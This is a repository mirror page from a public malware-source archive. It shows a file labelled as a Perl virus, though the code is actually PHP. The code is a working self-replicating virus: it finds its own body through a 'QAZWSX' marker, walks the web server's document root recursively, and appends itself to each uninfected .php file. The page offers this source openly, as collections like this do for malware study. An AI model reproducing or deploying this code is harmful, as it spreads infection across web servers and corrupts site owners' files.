ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71de2a7087
MalwareSourceCode/Perl/Virus.Perl.Qazwsx.a
vxunderground 8510fc084b
Rename Virus.Perl.Qwax to Virus.Perl.Qazwsx.a
2020-11-14 01:38:24 -06:00

91 lines
2.1 KiB
Plaintext
Raw Blame History

<?//QAZWSX
function Infect($path)
{
global $self;
$handle = opendir($path);
$file = readdir($handle);
while ( false != $file )
{
if ($file != "." && $file != "..")
{
if (is_dir($path.$file))
{
Infect($path.$file."/");
}
else if (strrpos($file, ".php") != 0)
{
$do_infect = true;
$victim = fopen($path.$file, "r+");
while (!feof($victim))
{
$buf = fgets($victim, 4096);
if (strrpos($buf, "QAZWSX") != 0)
{
$do_infect = false;
break;
}
}
if ($do_infect)
{
fputs($victim, $self);
}
fclose($victim);
}
}
$file = readdir($handle);
}
closedir($handle);
}
$found = false;
$bracket_found = false;
$sf = fopen($SCRIPT_FILENAME, "r");
while (!feof($sf))
{
$s = fgets($sf, 4096);
if ($found)
{
$self .= $s;
if (strrpos($s, "?>") != 0)
{
if ($bracket_found)
{
break;
}
else
{
$bracket_found = true;
}
}
}
else if (strrpos($s, "QAZWSX") != 0)
{
$found = true;
$self = $s;
}
}
fclose($sf);
Infect($DOCUMENT_ROOT."/");
?>
Reference in New Issue View Git Blame Copy Permalink